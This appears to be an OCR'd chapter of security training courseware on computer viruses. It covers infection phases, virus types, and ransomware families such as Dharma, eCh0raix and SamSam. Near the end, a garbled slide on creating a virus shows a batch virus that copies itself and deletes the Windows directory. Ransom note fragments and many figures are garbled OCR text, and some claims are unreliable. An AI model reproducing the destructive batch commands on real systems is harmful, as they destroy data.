Introduction To Viruses
Introduction To Viruses
u A virus is a self-replicating program that produces its own copy by attaching Itself to another program, computer boot sector
or document
ll Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments
J Indications of a virus attack include constant antivirus aJerts, suspicious hard drive activity, lack of storage space, unwanted
•
pop-up wlndows, etc.
Introduction to Viruses
Viruses are the scourge of modern computing. Computer viruses have the potential to wreak
havoc on both business and personal computers.The lifetime of a virus depends on its ability to
reproduce itself. Therefore, attackers design every virus code such that the virus replicates
itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of
itself to other executable code and operates without the knowledge or consent of the user. Like
a biological virus, a computer virus is contagious and can contaminate other files; however,
viruses can infect external machines only with the assistance of computer users.
Some viruses affect computers as soon as their code is executed; other viruses remain dormant
until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as
overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted
through file downloads, infected disk/flash drives, and email attachments.
Characteristics of Viruses
The performance of a computer is affected by a virus infection. This infection can lead to data
loss, system crash, and file corruption.
Some of the characteristics of a virus are as follows:
• Infects other programs
i Transforms itself
• Encrypts itself
• Alters data
• Corrupts files and programs
• Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a
company's data, as an act of vandalism, or to destroy a company's products; however, in some
cases, viruses aid the system.
An attacker creates a virus for the following purposes:
• Inflict damage on competitors
• Realize financial benefits
• Vandalize intellectual property
• Play pranks
• Conduct research
• Engage in cyber-terrorism
• Distribute political messages
• Damage network or computers
■ Gain remote access to the victim's computer
Indications of Virus Attack
Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a
virus by interrupting the regular flow of a process or a program. However, not all bugs created
contribute toward attacking the system; they may be merely false positives. For example, if the
system runs slower than usual, one may assume that a virus has infected the system; however,
the actual reason might be program overload.
An effective virus tends to multiply rapidly and may infect some machines in a short period.
Viruses can infect files on the system, and when such files are transferred, they can infect
machines of other users who receive them. A virus can also use file servers to infect files.
When a virus infects a computer, the victim or user will be able to identify some indications of
the presence of virus infection.
Some indications of computer virus infection are as follows:
• Processes require more resources and time, resulting in degraded performance
• Computer beeps with no display
• Drive label changes and OS does not load
• Constant antivirus alerts
• Computer freezes frequently or encounters an error such as BSOD
• Files and folders are missing
• Suspicious hard drive activity
• Browser window "freezes"
• Lack of storage space
• Unwanted advertisements and pop-up windows
Stages of Virus Lifecycle
Replication Virus replicates itself for a period within the target system and then spreads itself
l
I
Launch It gets activated when the user performs certain actions such as running infected programs
Execution of the
Users install antlvirus updates and eliminate the virus threats
damage routine
The virus lifecycle includes the following six stages from origin to elimination.
1. Design: Development of virus code using programming languages or construction kits.
2. Replication: The virus replicates for a period within the target system and then spreads
itself.
3. Launch: The virus is activated when the user performs specific actions such as running
an infected program.
4. Detection: The virus is identified as a threat infecting target system.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus. updates and eliminate the virus
threats.
Working of Viruses
r
Some viruses infect each time they are run,. and others
Before After infect only when a certain predefined condition Is met
l II I
Infection Infection such as a user's specific task, a day, time, or a specific
event
.EXE File .EXE File
Unfra.gmented File Before Attack
. ..[IJ . . . ..
File: A. File: 8
-
File Header
-
ftle Header
\l J
Page: 1 Page: 2 Page: '3 Page: 1 Page: 2 Page: 3
� ................................,':'
Page: 3 Page: 1 Page: 3 Page: 2 Page: Z
<lie File: B File:A File: 8 File:A
I fi !�:-A File; 8
_
.. ..................................... ........................................
, ..
Working of Viruses
Viruses can attack a target host's system using a variety of methods. They can attach
themselves to programs and transmit themselves to other programs through specific events.
Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit
themselves using non-executable files. "Trigger" and "dir-ect attack" events can cause a virus to
activate and infect the target system when the user triggers attachments received through
email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then
attack the system's built-in programs, antivirus software, data files, system startup settings, etc.
Viruses have two phases: the infection phase and the attack phase.
• Infection Phase
Programs modified by a virus infection can enable virus functionalities to run on the
system. The virus infects the target system after it is triggered and becomes active upon
the execution of infected programs, because the program code leads to the virus code.
The two most important factors in the infection phase of a virus are as follows:
o Method of infection
o Method of spreading
A virus infects a system in the following sequence:
o The virus loads itself into memory and checks for an executable on the disk.
o The virus appends malicious code to a legitimate program without the permission or
knowledge of the user.
o The user is unaware of the replacement and launches the infected program.
o The execution of the infected program also infects other programs in the system.
o The above cycle continues until the user realizes that there is an anomaly in the
system.
Apparently, the user unknowingly triggers and executes the virus for it to function.
There are many ways to execute programs while the computer is running. For example,
if the user installs any software tool, the setup program calls various built-in sub
programs during extraction. If a virus program already exists, it can be activated with
this type of execution, and the virus can also infect additional setup programs.
Specific viruses infect in different ways, such as
o A file virus infects by attaching itself to an executable system application program.
Potential targets for virus infections are as follows:
• Source code
• Batch files
• Script files
o Boot sector viruses execute their code before the target PC is booted.
Viruses spread in a variety of ways. There are virus programs that infect and keep
spreading every time the user executes them. Some virus programs do not infect
programs when first executed. They reside in a computer's memory and infect programs
later. Such virus programs wait for a specified trigger event to spread at a later stage.
Therefore, it is difficult to recognize which event might trigger the execution of a
dormant virus. As illustrated in the figure below, the.EXE file's header, when triggered,
executes and starts running the application. Once this file is infected, any trigger event
from the file's header can activate the virus code along with the application program
immediately after executing it.
The most popular methods by which a virus spreads are as follows:
o Infected files: A virus can infect a variety of files.
o File-sharing servic.es: A virus can take advantage of file servers to infect files. When
unsuspecting users open the infected files, their machines also become infected.
o DVDs and other storage media: When infected storage media such as DVDs, flash
drives, and portable hard disks are inserted into a clean system, the system gets
infected.
o Malicious attachments and downloads: A virus spreads if a malicious attachment
sent via email is opened or when apps are downloaded from untrusted sources.
r__
Before After
Infection Infection
I:
_ _ _ _ _..,
I IP I-.. .
l:J
Clean
File
'· • • • � Start of Program ; �►Start of Program
• Attack Phase
Once viruses spread throughout the target system, they start corrupting the files and
programs of the host system. Some viruses can trigger and corrupt the host system only
after the triggering event is activated. Some viruses have bugs that replicate themselves
and perform activities such as deleting files and increasing session time. Viruses corrupt
their targets only after spreading as intended by their developers.
Most viruses that attack target systems perform the following actions:
o Delete files and alter the content of data files, slowing down the system
o Perform tasks not related to applications, such as playing music and creating
animations
Unfragmented File Before Attack
File: A File: B
.. ............A.. . .. ..........A..
File Fragmented Due to Virus .Attack
.. ........................................................
• ,t.
...................�.
•I••••••• 0 • •• •• ■ • • • • • • • • • • ♦• •• 0 •• ..
The figure shows two files, A and B. Before the attack, the two files are located one after
the other in an orderly manner. Once a virus code infects the file, it alters the position of
the files placed consecutively, leading to inaccuracy in file allocations and causing the
system to slow down as the user tries to retrieve the file·s.
In the attack phase:
o Viruses execute upon triggering specific events
o Some viruses execute and corrupt via built-in bug programs after being stored in the
host's memory
o The latest and most advanced viruses conceal theiir presence, attacking only after
thoroughly spreading through the host
How does a Computer Get Infected by Viruses?
To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus
from any source and in any form, it replicates itself to other programs. Then, the virus can
infect the computer in various ways, some of which are listed below:
• Downloads: Attackers incorporate viruses in popular software programs and upload
them to websites intended for download. When a user unknowingly downloads this
infected software and installs it, the system is infected.
• Email attachments: Attackers usually send virus-infected files as email attachments to
spread the virus on the victim's system. When the victim opens the malicious
attachment, the virus automatically infects the system.
• Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office,
etc.) might infect the system as they may contain viruses.
• Failing to install security software: With the increase in security parameters, attackers
are designing new viruses. Failing to install the latest antivirus software or regularly
update it may expose the computer system to virus attac, ks.
• Updating software: If patches are not regularly installed when released by vendors,
viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
• Browser: By default, every browser comes with built-in security. An incorrectly
configured browser could result in the automatic running of scripts, which may, in turn,
allow viruses to enter the system.
• Firewall: Disabling the firewall will compromise the security of network traffic and invite
viruses to infect the system.
• Pop-ups: When the user clicks any susp1c1ous pop-up by mistake, the virus hidden
behind the pop-up enters the system. Whenever the user turns on the system, the
installed virus code will run in the background.
• Removable media: When a healthy system is associated with virus-infected removable
media (e.g., CD/ DVD, USB drive, card reader), the virus spreads the system.
• Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or
permitting a file sharing program that is accessed openly will allow a virus to take over
the device.
• Backup and restore: Taking a backup of an infected f ile and restoring it to a system
infects the system again with the same virus.
• Malicious online ads: Attackers post malicious online ads by embedding malicious code
in the ads, also known as malvertising. Once users click these ads, their computers get
infected.
• Social Media: People tend to click on social media sites, including malicious links shared
by their contacts, which can infect their systems.
Types of Viruses
'-' Viruses are categories according to their functioning and targets
J Some of the example includes:
Encryption Viru.s Shell and File Extension Virus Terminate & Stay Resident Virus
Types of Viruses
Computer viruses are malicious software programs written by attackers to gain unauthorized
access to a target system. Thus, they compromise the security of the system as well as its
performance. For any virus to corrupt a system, it has to first associate its code with executable
code.
The most common targets for a virus are the system sectors, which include the master boot
record (MBR) and the DOS boot record system sectors. An 05 executes code in these areas
while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones
because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during
system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses
conceal their code in some other disk space. The primary carriers of system or boot sector
viruses are email attachments and removable media (USB drives). Such viruses reside in
memory. Some sector viruses also spread through infected files; these are known as
multipartite viruses.
A boot sector virus moves MBR to another location on the hard disk and copies itself to the
original location of MBR. When the system boots, first, the virus code executes and then
control passes to the original MBR.
Before Infection
---MBR---+
7
After Infection
.....-....,--.....,.
•�.....a:.-.ui : .......... ..............
• Virus Removal
System sector viruses create the illusion that there is no virus on the system. One way to
deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac,
because Windows is more prone to such attacks. Linux and Macintosh have built-in
safeguards for protection against these viruses. The other approach is to periodically
perform antivirus checks.
File Viruses
File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ,
PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident
viruses.
File viruses insert their code into the original file and infect executable files. Such viruses are
numerous, albeit rare. They infect in a variety of ways and are found in numerous file types.
The most common type of file virus operates by identifying the file type it can infect most
easily, such as that with filenames ending in .COM or .EXE. Dur:ing program execution, the virus
executes along with program files to infect more files. Overwriting a virus is not easy, as the
overwritten programs no longer function properly. These viruses tend to be found immediately.
Before Inserting their code Into a program, some file viruses save the original instructions and
allow the original program to execute, so that everything appears normal.
File viruses hide their presence using stealth techniques to reside in a computer's memory in
the same way as system sector viruses. They do not show any increase in file length while
performing directory listing. If a user attempts to read the file, the virus intercepts the request,
and the user gets back his original file. File viruses can infect many file types, as a wide variety
of infection techniques exist.
Attacker
Figure 7.37: Working of file virus
Multipartite Viruses
A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of
file infectors and boot record infectors and attempts to simultaneously attack both the boot
sector and the executable or program files. When the virus infects the boot sector, it will, in
turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it
is not rooted out entirely from the target machine. Some examples of multipartite viruses
include Invader, Flip, and Tequila.
Macro Viruses
Macro viruses infects Microsoft Word or similar applications by automatically performing a
sequence of actions after triggering an application. Most macro viruses are written using the
macro language Visual Basic for Applications (VBA), and they infect templates or convert
infected documents into template files while maintaining their appearance of common
document files.
Macro viruses are somewhat less harmful than other viruses. They usually spread via email.
Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to
the extensive macro languages used in some programs, easily overlooks the line between a
data file and an executable file. In most cases, just to make things easy for users, the line
between a data file and a program starts to blur only when the default macros are set to run
automatically every time the data file is loaded. Virus writers can exploit universal programs
with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows
Help files can also contain macro code.
Cluster Viruses
Cluster viruses infect files without changing the file or planting additional files. They save the
virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk
read point to the virus code instead of the actual program. Even though the changes in the
directory entry may affect all the programs, only one copy of the virus exists on the disk.
A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer
system, and control is then passed to the actual program.
This virus infection leads to severe problems if the victim does not know its exact location. If it
infects memory, it controls access to the directory structure on the disk.
If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility
reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to
correct the problem. If the offer is accepted, the virus infects all the executable files and results
in the loss of original content, or all files might appear to be of the same size.
Stealth Viruses/Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service
call interrupts while running. The virus code replaces the requests to perform operations with
respect to these service call interrupts. These viruses state false information to hide their
presence from antivirus programs. For example, a stealth virus hides the operations that it
modified and gives false representations. Thus, it takes over portions of the target system and
hides its virus code.
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily
placing a copy of itself in some other system drive, thus replacing the infected file with the
uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the
system's functions that read files or system sectors. When another program requests
information that has already modified by the virus, the stealth virus reports that information to
the requesting program instead. This virus also resides in memory.
To avoid detection, these viruses always take over system functions and use them to hide their
presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus
attack because a Trojan installs the rootkit and is thus capable of hiding any malware.
0..
Give me the 5y5tem Hides Infected
file tcplp.sys to scan TCP·IP.SYS
···················> - ·················►
: Here you go -
. . . . ....... . ◄ .........•
L..J
Original TCPIP.SYS
• Virus Removal
o Always perform a cold boot {boot from write-protected CD or DVD)
o Never use DOS commands such as FDISK to fix the virus
o Use antivirus software
Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware,
codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an
encrypted copy of the virus and a decryption module. The decryption module remains constant,
whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which
enciphers the virus. When the attacker injects the virus into the target machine, the decryptor
will first execute and decrypt the virus body. Then, the virus body executes and replicates or
becomes resident in the target machine. The replication process ls successfully accomplished
using the encryptor. Each virus-infected file uses a different key for encryption. These viruses
employ XOR on each byte with a randomized key. The decryption technique employed is "x," or
each byte with a randomized key is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the
system. They use encryption to hide from virus scanners. The virus scanner cannot detect the
encryption virus using signatures, but it can detect the decrypting module.
.. .·.
••♦ Encryption key 1 Virus 1
.. .
Virus Code .
\
·......................
Encryption key 3
�
Encryption
Virus 3
A
program to detect the virus, thus allowing the virus to infect the target machine successfully.
Wake up on 1s lh of
every month and execute code
... ..c[••······························
f!l!!fl
Figure 7.41: Working of sparse infecter virus
Polymorphic Viruses
Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a
decryption module. Polymorphic viruses modify their code for each replication to avoid
detection. They accomplish this by changing the encryption module and the instruction
sequence. Polymorphic mechanisms use random number generators in their implementation.
The general use of the mutation engine is to enable polymorphic code. The mutator provides a
sequence of instructions that a virus scanner can use to op1i:imize an appropriate detection
algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A
simple integrity checker detects the presence of a polymorphic virus in the system's disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor
routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus
code. It decrypts the code only after taking control of the computer. The mutation engine
generates randomized decryption routines. Such decryption routines vary whenever the virus
infects a new program.
The polymorphic virus encrypts both the mutation engine and the virus code. When the user
executes a polymorphic-virus-infected program, the decryptor routine takes complete control
of the system, after which it decrypts the virus code and the mutation engine. Next, the
decryption routine transfers the system control of the virus, which locates a new program to
infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the
mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new
randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new
copies of both the virus code and the mutation engine. Thus, this virus, along with the newly
encrypted virus code and encrypted mutation engine (EME), appends the new decryption
routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of
the virus body and the changes in the decryption routine each time these viruses infect. It is
difficult for virus scanners to identify these viruses, as no two infections look alike.
L..... e....... .
0 """"•• ••• •• • •• �
Engine IE E)
£ncrvptod M'u�ttOn
Englne : .. • • • ............ :
! (1)$ltuct :
• • .............�.;,:·;;,;,:;;,:•,��;•....... I�=====�I
lnstr\ld ;
to cn�ate ! ! l'o crute :
£ncrvs,ted ViruJ
•···········..... ➔ newDR ! � newEME
F=7
Code DKryptor routine !...................
decrypt$ vfr1.1t codo
and mutation
Decrypt°' Routine en,clne NewVlrus
e
with new key
'--------'
• ·• · · ·>- Metamorphic Engine This diagram depicts metamorphic malware variants with recorded code
Content in the file before infection Content in the file after infection
Sales and marketing management is the Null Null. Null Null N\111 Null Null
leading authority for executives in the sales Null Nul1 Null Null N\111 N\111 Null
Null Null. Null Null N\111 N\111 Null
and marketing management industries. Null Null Null Null N\111 N\111. Null
The suspect, Desmond Turner, surrendered Null Null Null Null N\111 N\111 Null
B · · · · · · · · · · · · · · · · · · · · · · · · · · ·►f.
to authorities at a downtown Indianapolis Nul.l Null Null Null N\111 Null N\111
fast-food restaurant Null Null Null Null N\111 Null
Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus
infects the computer upon executing the file, and it modifies the hard disk data. Companion
viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical
COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it
is time to infect a file. It looks around and happens to find a file called notepad.exe. It now
creates a file called notepad.com, containing the virus. The virus usually plants this file in the
same directory as the .exe file; however, it can also place it in any directory on the DOS path. If
you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in
sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they
are all in the same directory). The virus executes, possibly infecting more files, and then loads
and executes notepad.exe. The user would probably fail to notice that something is wrong. It is
easy to detect a companion virus just by the presence of the extra COM file in the system.
Virus Infects
the system with a file
E]
notepad.com and saves it in
•-
··························> : ··········➔
c:\winnt\system32 directory
Shell Viruses
The shell virus code forms a shell around the target host program's code, making itself the
original program with the host code as its sub-routine. Nearly all boot program viruses are shell
viruses.
Before Infection
• � Original Program �
After Infection
:···················ey,
--1
+-
-1 Virus Code� � Original Proiram �
Folder views
... -.
You can apply this view (such as Details or Icons) lo
al folders or this type .
Reset Folders
Advanced settings:
� and Folders
0 �Wa"fS show icons, never thumbnails
0 �Wa"fS show menus
0 Display fie icon on thumbnails
0 Display file size nom,ation in folder�
0 Display the ful path in the title bar
®
Hidden mes and f�
Don\ show hidden files. folders. or drives
0 Show hidden files. folders. and drives
drives
�- o, I - • '
merge cOraa V
L Restore- Defaults
OK Cancel Apply
FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in
Microsoft products and some other types of computer systems to access the information
stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer.
FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so
that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly.
Many are designed to overwrite files or directories, and material on a computer can lost
permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in
addition to destroying data, forcing a user to reformat the computer.
Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to
locate files. The virus can spread to files when the FAT attempts to access them, corrupting the
entire computer eventually. FAT viruses often manifest in the form of corrupted files, with
users noting that files are missing or inaccessible. The FAT architecture itself can also be
changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is
using FAT12.
Logic Bomb Viruses
A logic bomb is a virus that is triggered by a response to an event, such as the launching of an
application or when a specific date/time is reached, where it involves logic to execute the
trigger.
For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The
keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is
designed to wait until you visit a website that requires you to log in with your credentials, such
as a banking site or social network. Consequently, the logic bomb will be triggered to execute
the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time
bomb. Time bombs are usually programmed to set off when important dates are reached, such
as Christmas and Valentine's Day.
Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web
browser security through a website. This allows attackers to inject client-side scripting into the
web page. It can bypass access controls and steal information from the web browser. Web
scripting viruses are usually used to attack sites with large populations, such as sites for social
networking, user reviews, and email. Web scripting viruses can propagate slightly faster than
other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send
spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent
viruses attack you without your knowledge. In the case of a persistent virus, your cookies are
directly stolen, and the attacker can hijack your session, which allows the attacker to
impersonate you and cause severe damage.
• Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted
HTML inputs, enforcing cookie security, disabling scripts, and using scanning services
such as an antivirus program with real-time protection for your web browser. It is also
beneficial to avoid unknown websites and use World of Trust to ensure that a site is
safe. You would notice if you are infected with a web scripting virus if your searches are
linked elsewhere and the background or homepage changes. The computer runs slowly
and sluggishly, and programs may close randomly. Modern-day browsers have add-ons
such as AdBlocker Plus, which allow users to prevent scripts from being loaded.
E-mail Viruses
An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated,
will result in some unexpected and L1sually harmful effects, such as destroying specific files on
your hard disk and causing the attachment to be emailed to everyone in your address book.
Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or
stealing personal data. Such viruses also vary in terms of how they are presented. For example,
a sender of an email virus may be unknown to a user, or a subject line may be filled with
nohsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a
trusted or known sender.
To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment
unless you know who sent it and what the attachment contains; in addition, you must install
and use antivirus software to scan any attachment before you open it.
Armored Viruses
Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to
prevent them from detecting the actual source of the infection. These viruses make it difficult
for antivirus programs to trace the actual source of the attack. They trick antivirus programs by
showing some other location even though they are actually on the system itself.
The following basic techniques are adopted by armored viruses:
• Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to
produce an incorrect program listing by disassembly analysis tools.
• Anti-debugging
Anti-debugging techniques are used to ensure that the program is not running under
the debugger. This can slow down the process of reverse engineering, but ft cannot be
prevented.
• Anti-heuristics
Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on
the program's ability to protect itself from programmer and debugger intervention.
• Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the
emulated system environment; they can also secure intellectual property against
emulation-assisted reverse engineering.
• Anti-goat
Anti-goat techniques use heuristic rules to detect possible goat files such as a virus that
cannot infect a file if it is too small or if it contains a large amount of do-nothing
instructions. Anti-goat viruses require more time for analysis.
Add-on Viruses
Add-on viruses append their code to the host code without making any changes to the latter or
relocate the host code to insert their code at the beginning.
Original Program
T Original Program
Original Program
: JUMP � • :
I . .
t.............· .........·· ....· ......· ....· .....··..·· ......· ..........· ....·· .....· .. • .... JUMP,....... t
Figure 7.48: Working of add-on virus
Intrusive Viruses
Intrusive viruses overwrite the host code completely or partly with the viral code.
Original Program
Original Program
Ransomware is a type of malwarethat restricts access to the computer system's files and folders and demands
an on line ransom payment to the malware creator(s) to remove the restrictions
Dharma •
---
Ransomwa.re Families
All your flies have been encrypted!
bharma is a dreadful e ce,ber
•--r;.-----
11, ____on,:,...,.............._...,... __1>1:,,1 __..___.........-,
_ .
__.,.1..... ,.".......-...�
1--�--·--
__ __
l,, _.,,.....,_.,,,.,,,,..n..-•.....-• ..,.1,io.(oo_,___ e CTB-Locker
...
.....-...... ....______
,--------��.....-.....-
victims through email --""" i�•-•• ·-• n. ,_...,.,..,......,,.,,.. ......, ... -•--
campaigns; the ransom ... .,,.. & Sodlnokibl
notes ask the victims to -,.....,_ ,
•"--lllr-·•--
, ___,._ e BltPaymer
contact the threat actors
via a provided email e CryptXXX
r-·-·.-· .........
address and pay In bltcolns 11•-tWl'_a __ .,,..,,_...
,,.. ,.,.,,. __
Al ___""----"-----
'WL.l,.1, -m\ltNte\twFJb.,, '
e Crypto locker Ransomware
�---� .,...,
o1.,..-...,--<11tooi _____ ,,.,.,.t,1____..,,..... ..-....... -...._
Dharma- Ransom Notes
e Crypto Defense Ran.somware
Ransornware (Cont'd)
eChOralx ls a new raos.omware that spe:dflcally SamSam ls a notorious ransomware that has
targets Unu,c: devices wllh QNAP Nl!twork Attached lnfected millions of unpatcbed serveB by
eChOraix I SaxnS.un I
_ ___ _____
Storages (NAS} by employing Ille AES encryption employing the RSA-2048 asymmetric
tMhnlque e-ncryptlon tMhnlque
__ _....., - ......
':::, ::.:;;..-.::=.- • ..,..i.-.... .. --... --........ _,.,_ .....
• Dharma
Dharma is a dreadful ransomware that was first identified in 2016; since then, it has
been affecting various targets across the globe with new versions. It has been regularly
updated with sophisticated mechanisms in recent years. At the end of March 2019,
Dharma struck a parking lot system in Canada. Previously, it also infected a Texas
hospital and some other organizations. The variants of this ransomware have the
following extension: .adobe, .bip, .combo, .cezar, .ETH!, .java. Its encrypted files have
new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption
algorithm to encrypt data and then displays ransom notes. These ransom notes are
named as either lnfo.hta or FILES ENCRYPTED.txt. This ransomware carries out through
email campaigns. The ransom notes ask victims to contact the threat actors via the
provided email address and pay in bitcoins for the decryption service.
i:d
All your files have been encrypted!
AJl yotJT fifeshavebeenen:;rypteddoetoasearl\y problem with yOIS PC. Jf you want to restore them, wrileus tothee-mall
eacttUldtouns@aol,cc,m
Wrlle lhh 10 In 1hc 1llleof youcmco- /\C1971l68
In case or no answe,- \n 24 hours wrlle us to theese &1nfflls: mcla1,._nelvio@aol.co01
Ya, Mv<O., P"I fo, dea-.,:,om n e..,ons_ The J)riot depends"" t»w fau yw- ID us. Afret paym,nc..,..,
send yw lhe dl!aypoon """""''
wt�alye,.rflo<.
to obUtlfl Bltcolns
Th, -t ..,., ID l;uy- It� ,it,, You'- ID "'O"tlr, d,:I, � bl«n', rd-. lho""" by� meth>d'""
tetm�rornbttbttPoos
Also you can lm01her ii,>ees to t,;y 8'!:onsaridbegrne<slJ.odehere:
�.mxht <9!Jl{JJ[q�l)(:btwpn<{
,....,.,.�fies.
11> de<ryptye,.r dala uong 11-wd party ..itw..-e, ¢ ""'f <aJSe perm,nndala loss.
o( yov fies WIii, !he hot, of 11-wd P«bOS may """4! n<reosed I>"" (11,ey «I:! ,t,.. fee 11> <») « yo,., c,n boco<no o w:om or a-,.
• eChOraix
eCh0raix is a new ransomware that specifically targets Linux devices with QNAP
network-attached storage (NAS). It infects and encrypts the victim's machine using the
AES encryption technique. This malware was developed using the Go programming
language, and it has a very limited number of code lines, i.e., 400. Once the malware
infects the system, it communicates with its malicious C2C server via Tor
networks/SOCKSS proxy servers and then initiates the encryption process.
Status: Waning Payment. .
If you want decrypting your files send 0.055 fe:) BTC(bitcoin)
to this address: 1LWqmP4oTjWS3ShtHWm1UjnvaLxfMr2kjm ee:i
Or use QR code
• SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018.
It was first discovered in 2016; however, it was considered as a grave ransomware after
the WannaCry attack due to its vast victim base in 2018. SamSam employs the RSA-2048
asymmetric encryption technique to encrypt the acquired local files in the infected
systems. Unlike other ransomware, this ransomware does not attack victims randomly.
This ls a targeted ransomware, which specifically targets certain reputed companies. In
spite of knowing this, large multi-national companies were unable to defend themselves
from such attacks. The attack technique employed by this ransomware is also different
from that employed by other ransomware. Nearly all ransomware uses spam emails to
propagate and perform attacks; however, SamSam employs brute-force tactics against
weak passwords of the Remote Desktop Protocol (RDP).
Uol. u • e9'�rt.c llt)"I.TtOOn�lu,c e\9'0'ltt-. YN ltHO one h'I tot �ft«ffl.lO■ u.d in4 'ffY r..o-t
Jct yoo n-e..S Pr1••�� t•Y �o r•conr ,our Ul1t•.
Ike�••
I�•• twt po•11bl• IQ TltOO'ftf f'C"llf h1•1 YUllol,T; U1-t« 'n,y
� l!.1i-co.1t1t .T.di4.N••:w,,v,�ut.,�OcCV�
UC ,- ,.oa. ... _, 1btl"OUl,,f '°'" •11 fie'•• t..•'NI • -.rtt oa ew> HU, wull tA1ll 0.u.11' Jlut. Yrit:llf ·tor- All Uteot:.-d" ,c•,· UI J'9llt G�tl
&,1.1..o U )'911 ..-.at '4V ''" -.u •H•crt•ii- ,c•,· ,_ c-- »•-r 1, IUOOJ.QI ,o nQO- •• u ot "-•vw1u.M1...ay) •W .,,. ... � .. ucy U ,..Ad 2N Wt t.O
for ·.CC,U• "° •r ,.u. 'l"O'O-•c.U•Wl TOI' ........... flllll �u· o,u ··" WJ. Ul V'O;\U" ir.-or OtoW..I'.
tcv eaa IIOWP-l•o cqr __ ".,. '"" <ain.::Lft!"1.=z.: "�attallll:.>llJLa:Wc,:;:....a, � A
� efflc.e l'Od � t,q 11't:cc.la •1a. CUA O.,c,o11-t e--r tliute.nQl..loa � uep.,,sl/.i.oc.Ub.U:G01A9,oai o.r ht.�tl/aiuc..fe..aa.bllylU�t'c.n..pl;p
le� �HT OOQ•t Md "11)' Yetttl"'t.lOf'I -4 ,onit "tOa-1: a.ueou �lctly.
tde•d.li..n•
.
Ut
..
L:opy \\t + Game.bat ; :
c: \Windows\-* • : :
.
When run, it copies itself to
Cort\len the Game.bat
all the .bat files in the cur,ent
batch·file to Game.com
directory and deletes all the
using the bat2c.o,m utility
mes in t.he Windows directory
r--
How to Infect Systems Using a Virus: Creating a Virus (Cont'd)
... m�
6,;11:"c:;.J ...._...
I Wecl />ll .Mp3 file, ] ! Wed Al .lo\>4 R.. I � Wed Al .Png Fie,
Infect Alelype
Ent« Ale E,t......, To Wea (cg 'bt1
lnl«net S,,,.adilg
I Send To Ccttaci> I Senos 11M To pjl Con!acls On J'1icro-,11 Oullool<
�Ml;mailAnachmert
n ..
� I A11!<v!t14 •
J A well-designed, fake afitivirus looks authentic
and often encourages users to install it on
their systems, perform updates, or remove -·-
ANAn11vw\1•1019•�&
